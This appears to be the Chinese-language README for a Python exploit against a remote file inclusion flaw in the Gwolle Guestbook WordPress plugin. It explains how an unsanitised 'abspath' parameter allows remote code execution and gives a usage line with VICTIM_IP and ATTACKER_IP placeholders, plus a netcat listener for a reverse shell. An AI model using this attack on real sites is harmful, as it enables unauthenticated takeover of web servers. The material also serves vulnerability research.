此 Python 脚本利用了 Gwolle Guestbook WordPress 插件中的一个严重远程文件包含(RFI)漏洞,未经身份验证的攻击者可以利用该漏洞包含远程 PHP 文件并在易受攻击的系统上执行任意代码。
HTTP GET 参数 "abspath" 在被用于 PHP require() 函数之前未经过正确的清理。远程攻击者可以从任意远程服务器包含名为 'wp-load.php' 的文件,并在易受攻击的 Web 服务器上执行其内容。为此,攻击者需要将一个恶意的 'wp-load.php' 文件放置在其服务器文档根目录中,并将服务器 URL 包含到请求中。
成功利用此漏洞可能导致整个 WordPress 安装被入侵,甚至可能导致整个 Web 服务器被入侵。
该脚本需要三个参数:
示例:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT注意:你需要在攻击者机器上打开指定端口的 netcat 监听器。
此脚本仅用于教育目的。作者不对因滥用此脚本而造成的任何损害负责。